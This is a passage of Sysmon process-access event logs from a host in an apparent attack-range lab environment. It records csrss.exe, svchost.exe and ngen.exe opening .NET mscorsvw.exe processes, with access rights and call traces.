c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.085\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B8150C00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.085","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B8150C00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B8150C00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B8150C00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.132\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104E190C00}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.132","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104E190C00}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.132\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104E190C00}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.132","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104E190C00}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.148\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00104BDE0C00}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.148","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00104BDE0C00}","TargetProcessId":"4676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.210\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B61C0C00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.210","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B61C0C00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.210\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B61C0C00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.210","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B61C0C00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010B61C0C00}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-0010B61C0C00}","TargetProcessId":"880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\